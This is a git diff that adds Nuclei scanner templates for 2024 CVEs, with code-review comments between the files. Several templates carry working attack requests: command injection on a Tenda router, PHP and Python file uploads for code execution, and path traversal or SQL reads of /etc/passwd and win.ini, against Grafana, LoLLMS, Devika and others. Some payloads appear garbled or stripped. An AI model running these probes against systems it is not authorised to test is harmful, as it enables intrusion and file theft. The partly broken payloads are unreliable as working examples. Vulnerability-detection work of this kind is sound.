@@ -0,0 +1,45 @@ +id: CVE-2024-38653 + +info: + name: Ivanti Avalanche SmartDeviceServer - XML External Entity + author: DhiyaneshDK + severity: high + description: | + XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server. + reference: + - https://github.com/D4mianWayne/POCs/tree/main/CVE%202024-38653 + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-38653 + cwe-id: CWE-611 + epss-score: 0.00697 + epss-percentile: 0.80607 + cpe: cpe:2.3:a:ivanti:avalanche:6.3.1:*:*:*:premise:*:*:* + metadata: + vendor: ivanti + product: avalanche + tags: cve,cve2024,intrusive,ivanti,avalanche,xxe + +http: + - raw: + - | + PUT /mdm/checkin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + + %asd; + %c; + ]> + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" diff --git a/poc/cve/CVE-2024-41468.yaml b/poc/cve/CVE-2024-41468.yaml new file mode 100644 index 0000000000..d611112202 --- /dev/null +++ b/poc/cve/CVE-2024-41468.yaml 
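Review bot: As shown, the PUT body contains only `%asd; %c; ]>` — no `<!DOCTYPE`/`<!ENTITY` declarations and no reference to `{{interactsh_url}}` — so the `interactsh_protocol: dns` matcher can never fire; if the declarations were lost to HTML stripping on this page, confirm the committed file still declares the external parameter entity pointing at the interactsh host. Pin the callback to this template by also matching `part: interactsh_request` on the entity name, since a bare DNS hit could originate from any other out-of-band activity on the same session. `matchers-condition: and` with a single matcher is harmless but misleading.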
@@ -0,0 +1,41 @@ +id: CVE-2024-41468 + +info: + name: Tenda FH1201 v1.2.0.14 - Command Injection + author: s4e-io + severity: critical + description: | + Tenda FH1201 v1.2.0.14 was discovered to contain a command injection vulnerability via the cmdinput parameter at /goform/exeCommand + reference: + - https://github.com/iotresearch/iot-vuln/blob/main/Tenda/FH1201/exeCommand/README.md + - https://www.4awl.net/10184.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-41468 + cwe-id: CWE-78,CWE-94 + epss-score: 0.00065 + epss-percentile: 0.29645 + cpe: cpe:2.3:o:tendacn:fh1201_firmware:1.2.0.14:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: tendacn + product: fh1201_firmware + tags: cve,cve2024,tenda,rce + +http: + - raw: + - | + POST /goform/exeCommand HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cmdinput=ifconfig%3B + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "inet", "addr", "Ethernet")' + - 'status_code == 200' + condition: and diff --git a/poc/cve/CVE-2024-42640.yaml b/poc/cve/CVE-2024-42640.yaml new file mode 100644 index 0000000000..b7c6e9a69c --- /dev/null +++ b/poc/cve/CVE-2024-42640.yaml 
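Review bot: The probe executes `ifconfig;` and then accepts any 200 body containing `inet`, `addr` and `Ethernet`, which a device status page served from the same handler (or an error page echoing interface details) could satisfy without any injection having occurred. Inject a random marker instead — `cmdinput=echo%20{{marker}}%3B` with `variables: marker: "{{rand_base(8)}}"` — and match on the marker, which is both more specific and quieter on the device. Since the check runs a command on the router it should carry the `intrusive` tag.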
@@ -0,0 +1,69 @@ +id: CVE-2024-42640 + +info: + name: Angular-Base64-Upload - Remote Code Execution + author: s4e-io + severity: critical + description: | + angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + reference: + - https://github.com/rvizx/CVE-2024-42640 + - https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html + - https://github.com/adonespitogo/angular-base64-upload + - https://nvd.nist.gov/vuln/detail/CVE-2024-42640 + classification: + cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H + cvss-score: 10 + cve-id: CVE-2024-42640 + cwe-id: CWE-94 + epss-score: 0.00043 + epss-percentile: 0.09695 + tags: cve,cve2024,angular,rce + +variables: + filename: "{{to_lower(rand_text_alpha(12))}}" + num: "{{rand_int(1000000,9999999)}}" + +flow: http(1) && http(2) && http(3) && http(4) + +http: + - raw: + - | + POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"base64": "{{base64(num)}}", "filename": "{(unknown)}.php"} + + - raw: + - | + POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"base64": "{{base64(num)}}", "filename": "{(unknown)}.php"} + + matchers: + - type: dsl + dsl: + - 'contains(body_1,"uploads/{(unknown)}.php") || contains(body_2,"uploads/{(unknown)}.php") ' + - 'status_code_1 == 200 || status_code_2 == 200' + condition: and + internal: true + + - raw: + - | + GET 
/node_modules/angular-base64-upload/demo/uploads/{(unknown)}.php HTTP/1.1 + Host: {{Hostname}} + + - raw: + - | + GET /bower_components/angular-base64-upload/demo/uploads/{(unknown)}.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_3, "{{num}}") || contains(body_4, "{{num}}")' + - 'status_code_3 == 200 || status_code_4 == 200' + condition: and diff --git a/poc/cve/CVE-2024-4320.yaml b/poc/cve/CVE-2024-4320.yaml new file mode 100644 index 0000000000..b57e49ab19 --- /dev/null +++ b/poc/cve/CVE-2024-4320.yaml 
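Review bot: Steps 1 and 2 upload a randomly named `.php` file that nothing removes, so a positive run leaves an executable artifact under `demo/uploads`, but `tags` carry no `intrusive` marker and `metadata` has no `max-request: 4`; both belong in the template. The matcher on the second `http` entry references `body_1` and `status_code_1`, which belong to the first entry; whether those names resolve across separate entries in flow mode is not evident from this file, so confirm it against the runner or place both POSTs in one `raw` list where the indexed variables are guaranteed. The `{(unknown)}` tokens in the filename and path lines appear to be a rendering artifact for `{{filename}}`, the only variable declared for that purpose; worth a glance at the committed file to be sure.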
@@ -0,0 +1,53 @@ +id: CVE-2024-4320 +info: + name: CVE-2024-4320 + author: Kim Dongyoung (Kairos-hk), bolkv, n0ming, RoughBoy0723 + severity: Critical + description: | + Remote Code Execution due to LFI in '/install_extension' in parisneo/lollms-webui + impact: | + Remote Code Execution. lollmscan be exposed to external endpoint or the ui when binding to 0.0.0.0 or in headless mode. (can be set via official docs here) thus no user interactions are required. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-4320 + - https://huntr.com/bounties/d6564f04-0f59-4686-beb2-11659342279b + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-4320 + tags: cve,cve2024, RCE, LFI + +requests: + - raw: + - | + POST /uploadfile/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW + + ------WebKitFormBoundary7MA4YWxkTrZu0gW + Content-Disposition: form-data; name="file"; filename="__init__.py" + Content-Type: text/x-python + + print("Exploited") + ------WebKitFormBoundary7MA4YWxkTrZu0gW-- + + - | + POST /install_extension HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "name": "../../../../../../../../../../../path/to/uploads/__init__.py" + } + + - | + GET /uploads/__init__.py HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Exploited" diff --git a/poc/cve/CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9.yaml b/poc/cve/CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9.yaml new file mode 100644 index 0000000000..7d803f7aea --- /dev/null +++ b/poc/cve/CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9.yaml 
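Review bot: The second request targets `../../../../../../../../../../../path/to/uploads/__init__.py`, where `/path/to/uploads` is a literal placeholder, so as written the template can never reach the file it just uploaded; it needs the application's real upload location or a documented variable. `severity: Critical` and `tags: cve,cve2024, RCE, LFI` use capitals and spaces, unlike every other template in this commit (`severity: critical`, `tags: cve,cve2024,rce,lfi`), and `requests:` is the legacy key where the siblings use `http:`. `name: CVE-2024-4320` repeats the id instead of describing the finding; something like `name: LoLLMS WebUI - Remote Code Execution via install_extension Path Traversal` would follow the house style, and since the template installs an uploaded `__init__.py`, `intrusive` belongs in the tags as well.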
@@ -0,0 +1,59 @@ +id: CVE-2024-44047-1273fc886c0e5f1dea85089a551277e9 + +info: + name: > + IMPress for IDX Broker <= 3.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The IMPress for IDX Broker plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dfc5868-1215-465f-8a4e-3703c18d7dca?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-44047 + metadata: + fofa-query: "wp-content/plugins/idx-broker-platinum/" + google-query: inurl:"/wp-content/plugins/idx-broker-platinum/" + shodan-query: 'vuln:CVE-2024-44047' + tags: cve,wordpress,wp-plugin,idx-broker-platinum,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/idx-broker-platinum/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "idx-broker-platinum" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-45309.yaml b/poc/cve/CVE-2024-45309.yaml new file mode 100644 index 0000000000..37caefa815 --- /dev/null +++ b/poc/cve/CVE-2024-45309.yaml 
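Review bot: `severity: low` contradicts the attached `cvss-score: 6.4` (the medium band), and the same mismatch recurs in the CVE-2024-7985 (7.5), CVE-2024-9162 (7.2), CVE-2024-9376 (6.4), CVE-2024-9505 (6.4) and CVE-2024-9629 (5.4) templates in this commit; align `severity` with the score band, or state in `description` that a readme-only version check is deliberately downgraded. Every template in this series, including CVE-2024-9438 and CVE-2024-9933, declares the `version` extractor twice with identical regexes, once `internal: true` and once visible; if the runner needs the internal copy so `compare_versions` can see the value and the second only to print it, a one-line comment saying so would spare the next maintainer the question. `cwe-id` is absent from the whole series although the other CVE templates in the commit carry it.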
@@ -0,0 +1,51 @@ +id: CVE-2024-45309 + +info: + name: onedev < 11.0.9 - Arbitrary File Read + author: isacaya + severity: high + description: | + Files on the host computer can be accessed by directory traversal. + impact: | + An attacker would be able to view the contents of a file on the computer. + remediation: | + Update to version 11.0.9. + reference: + - https://x.com/Siebene7/status/1848727539046617324 + - https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489 + classification: + cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N + cvss-score: 8.7 + cve-id: CVE-2024-45309 + cwe-id: CWE-200 + metadata: + vendor: onedev + product: onedev + framework: java + tags: cve,cve2024,lfi,onedev +variables: + projectName: + +http: + - method: GET + path: + - "{{BaseURL}}/{{projectName}}/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{{path}}" + + payloads: + path: + - /etc/passwd + - /windows/win.ini + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/cve/CVE-2024-4841.yaml b/poc/cve/CVE-2024-4841.yaml new file mode 100644 index 0000000000..92895bd59c --- /dev/null +++ b/poc/cve/CVE-2024-4841.yaml 
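Review bot: `variables: projectName:` has no value, so `{{projectName}}` renders as an empty string and the probe path starts `//~site/...`, which is unlikely to reach a project route; either give the variable a default or annotate it, e.g. `projectName: "" # required: supply with -var projectName=<project>`, so operators know a bare run proves nothing. The `metadata` block also lacks `max-request: 2`, which the two payload paths imply.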
@@ -0,0 +1,60 @@ +id: CVE-2024-4841 + +info: + name: LoLLMS WebUI - Subfolder prediction via Path Traversal + author: s4e-io + severity: medium + description: | + A Path Traversal vulnerability exists in the parisneo/lollms-webui, specifically within the 'add_reference_to_local_mode' function due to the lack of input sanitization. This vulnerability affects versions v9.6 to the latest. By exploiting this vulnerability, an attacker can predict the folders, subfolders, and files present on the victim's computer. The vulnerability is present in the way the application handles the 'path' parameter in HTTP requests to the '/add_reference_to_local_model' endpoint. + reference: + - https://huntr.com/bounties/740dda3e-7104-4ccf-9ac4-8870e4d6d602 + - https://nvd.nist.gov/vuln/detail/CVE-2024-4841 + classification: + cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4 + cve-id: CVE-2024-4841 + cwe-id: CWE-29 + epss-score: 0.00043 + epss-percentile: 0.09834 + metadata: + verified: true + max-request: 1 + fofa-query: "LoLLMS WebUI - Welcome" + tags: cve,cve2024,lollms-webui +variables: + folder: "{{to_upper(rand_text_alpha(10))}}" + +flow: http(1) && http(2) + +http: + - raw: + - | + POST /add_reference_to_local_model HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"path":"\\Users"} + + matchers: + - type: dsl + dsl: + - 'contains(body, "{\"status\":true}")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and + + - raw: + - | + POST /add_reference_to_local_model HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"path":"\\{{folder}}"} + + matchers: + - type: dsl + dsl: + - 'contains(body, "{\"status\":false,\"error\":\"Model not found\"}")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and diff --git a/poc/cve/CVE-2024-5334.yaml b/poc/cve/CVE-2024-5334.yaml new file mode 100644 index 0000000000..10fa822e0f --- /dev/null 
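Review bot: `max-request: 1` understates the two raw requests issued by `flow: http(1) && http(2)`; set `max-request: 2`. The first step requires `{"status":true}` for the path `\\Users`, a Windows-only directory, so a vulnerable deployment on a Unix host fails step 1 and is never reported; if the Windows scope is intentional, say so in `description`, otherwise add a probe for a directory that exists on Unix hosts as well.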
+++ b/poc/cve/CVE-2024-5334.yaml
@@ -0,0 +1,48 @@
+id: CVE-2024-5334
+
+info:
+ name: Devika - Local File Inclusion
+ author: nechyo,nukunga,harksu,olfloralo,gy741
+ severity: high
+ description: Devika is vulnerable to local file inclusion.
+ impact: |
+ Successful exploitation could lead to unauthorized access to sensitive files and data.
+ remediation: |
+ Ensure input validation is implemented to prevent malicious file inclusions and use whitelists for allowed file paths.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-5334
+ - https://huntr.com/bounties/7eec128b-1bf5-4922-a95c-551ad3695cf6
+ - https://github.com/stitionai/devika/commit/6acce21fb08c3d1123ef05df6a33912bf0ee77c2
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-5334
+ cwe-id: CWE-73
+ epss-score: 0.00043
+ epss-percentile: 0.09666
+ metadata:
+ max-request: 1
+ tags: cve,cve2024,devika,lfi,unauth
+
+http:
+ - raw:
+ - |
+ GET /api/get-browser-snapshot?snapshot_path=/etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "Content-Disposition: attachment; filename=passwd"
+ - "Content-Type: application/octet-stream"
+
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2024-6049.yaml b/poc/cve/CVE-2024-6049.yaml
new file mode 100644
index 0000000000..0230513416
--- /dev/null
+++ b/poc/cve/CVE-2024-6049.yaml
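Review bot: The header word matcher lists two strings without a `condition`, and the default for `words` is `or`, so a response carrying only `Content-Type: application/octet-stream` satisfies it; add `condition: and` under that matcher so the `Content-Disposition: attachment; filename=passwd` header is actually required. The body regex and the status matcher still gate the overall result under `matchers-condition: and`, so the practical exposure is small, but the header check as written does not assert what it appears to.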
@@ -0,0 +1,54 @@ +id: CVE-2024-6049 + +info: + name: Lawo AG - vsm LTC Time Sync (vTimeSync) - Path Traversal + author: s4e-io + severity: high + description: | + The web server of Lawo AG vsm LTC Time Sync (vTimeSync) is affected by a "..." (triple dot) path traversal vulnerability. By sending a specially crafted HTTP request, an unauthenticated remote attacker could download arbitrary files from the operating system. As a limitation, the exploitation is only possible if the requested file has some file extension, e. g. .exe or .txt. + reference: + - https://lawo.com/lawo-downloads/ + - https://r.sec-consult.com/lawo + - https://packetstormsecurity.com/files/182347/Lawo-AG-vsm-LTC-Time-Sync-Path-Traversal.html + - https://sec-consult.com/vulnerability-lab/advisory/unauthenticated-path-traversal-vulnerability-in-lawo-ag-vsm-ltc-time-sync-vtimesync/ + - https://nvd.nist.gov/vuln/detail/cve-2024-6049 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-6049 + cwe-id: CWE-32 + epss-score: 0.00043 + epss-percentile: 0.09833 + metadata: + verified: true + max-request: 2 + tags: cve,cve2024,lawo,lfi,seclists,packetstorm + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname} + + host-redirects: true + matchers: + - type: word + part: body + words: + - "vTimeSync" + internal: true + case-insensitive: true + + - raw: + - | + GET /../../../../../../../../../Windows/win.ini HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"bit app support","fonts","extensions")' + - 'status_code == 200' + condition: and diff --git a/poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml b/poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml new file mode 100644 index 0000000000..a940612774 --- /dev/null +++ b/poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml 
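Review bot: The first request's `Host: {{Hostname}` is missing its closing brace, so the placeholder is not expanded and the probe is sent with a literal `{{Hostname}` host header; because that step is `internal: true` and gates the flow, the template most likely never reaches the traversal request at all. Fix it to `Host: {{Hostname}}`. Separately, `description` calls this a triple-dot (`...`) traversal, yet the second request uses `../` sequences, and a raw path containing `../` is normally normalized by the client before sending unless `unsafe: true` is set on the request; confirm the payload form against the referenced advisory and add `unsafe: true` if the path must go out verbatim.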
@@ -0,0 +1,59 @@ +id: CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937 + +info: + name: > + FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The FileOrganizer – Manage WordPress and Website Files plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the "fileorganizer_ajax_handler" function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: The FileOrganizer Pro plugin must be installed and active to allow Subscriber+ users to upload files. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f79164c2-be3b-496d-b747-3e4b60b7fc2b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2024-7985 + metadata: + fofa-query: "wp-content/plugins/fileorganizer/" + google-query: inurl:"/wp-content/plugins/fileorganizer/" + shodan-query: 'vuln:CVE-2024-7985' + tags: cve,wordpress,wp-plugin,fileorganizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fileorganizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fileorganizer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.9') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9162.yaml b/poc/cve/CVE-2024-9162.yaml new file mode 100644 index 0000000000..57a2c6b7cb --- /dev/null +++ b/poc/cve/CVE-2024-9162.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9162 + +info: + name: > + All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection + author: topscoder + severity: low + description: > + The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and including, 7.86. This makes it possible for authenticated attackers, with Administrator-level access and above, to create an export file with the .php extension on the affected site's server, adding an arbitrary PHP code to it, which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d97c3379-56c9-4261-9a70-3119ec121a40?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-9162 + metadata: + fofa-query: "wp-content/plugins/all-in-one-wp-migration/" + google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/" + shodan-query: 'vuln:CVE-2024-9162' + tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-in-one-wp-migration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.86') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9264.yaml b/poc/cve/CVE-2024-9264.yaml new file mode 100644 index 0000000000..939368a915 --- /dev/null +++ b/poc/cve/CVE-2024-9264.yaml 
@@ -0,0 +1,92 @@ +id: CVE-2024-9264 + +info: + name: Grafana Post-Auth DuckDB - SQL Injection (File Read) + author: princechaddha + severity: critical + description: The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions. + remediation: | + Apply the vendor-supplied patch or upgrade to a non-vulnerable version. + reference: + - https://x.com/nol_tech/status/1847639874909749443 + - https://nvd.nist.gov/vuln/detail/CVE-2024-9264 + - https://grafana.com/security/security-advisories/cve-2024-9264/ + - https://github.com/fkie-cad/nvd-json-data-feeds + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-9264 + cwe-id: CWE-94 + epss-score: 0.00043 + epss-percentile: 0.09691 + metadata: + max-request: 2 + vendor: grafana + product: grafana + shodan-query: + - http.title:"grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + fofa-query: + - app="grafana" + - title="grafana" + google-query: intitle:"grafana" + tags: cve,cve2024,grafana,authenticated +flow: http(1) && http(2) + +http: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + content-type: application/json + + {"user":"{{username}}","password":"{{password}}"} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "grafana_session" + internal: true + + - raw: + - | + POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q101 HTTP/1.1 + 
Host: {{Hostname}} + Content-Type: application/json + + { + "from": "1729313027261", + "queries": [ + { + "datasource": { + "name": "Expression", + "type": "__expr__", + "uid": "__expr__" + }, + "expression": "SELECT content FROM read_blob('/etc/passwd')", + "hide": false, + "refId": "B", + "type": "sql", + "window": "" + } + ], + "to": "1729334627261" + } + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "root:" + + - type: word + part: body + words: + - '"data":{' diff --git a/poc/cve/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml b/poc/cve/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml new file mode 100644 index 0000000000..a28570e900 --- /dev/null +++ b/poc/cve/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml 
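Review bot: The login request interpolates `{{username}}` and `{{password}}`, but the template neither declares them under `variables:` nor documents that they must be supplied, so a default run posts empty credentials and the `internal` `grafana_session` check fails silently with no hint why; add a `variables:` block or a `description` line such as `Requires -var username=<user> -var password=<pass>`. Whether the session cookie from step 1 is carried into the `/api/ds/query` request depends on the runner's cookie-reuse default; if the supported nuclei version does not reuse cookies automatically, `cookie-reuse: true` is needed on the `http` block. The enclosing hunk begins on the previous line, with the `info` block.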
@@ -0,0 +1,59 @@ +id: CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952 + +info: + name: > + Kata Plus – Addons for Elementor – Widgets, Extensions and Templates <= 1.4.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Kata Plus – Addons for Elementor – Widgets, Extensions and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/05c7267e-2e0c-48e9-bdaa-c8bc0b9ec8a6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9376 + metadata: + fofa-query: "wp-content/plugins/kata-plus/" + google-query: inurl:"/wp-content/plugins/kata-plus/" + shodan-query: 'vuln:CVE-2024-9376' + tags: cve,wordpress,wp-plugin,kata-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kata-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kata-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.7') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml b/poc/cve/CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml new file mode 100644 index 0000000000..ba15637cf5 --- /dev/null +++ b/poc/cve/CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35 + +info: + name: > + SEUR Oficial <= 2.2.11 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The SEUR Oficial plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'change_service' parameter in all versions up to, and including, 2.2.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88edf229-2be2-49d0-b500-e8ff7708f806?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9438 + metadata: + fofa-query: "wp-content/plugins/seur/" + google-query: inurl:"/wp-content/plugins/seur/" + shodan-query: 'vuln:CVE-2024-9438' + tags: cve,wordpress,wp-plugin,seur,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/seur/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "seur" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.11') \ No newline at end of file 
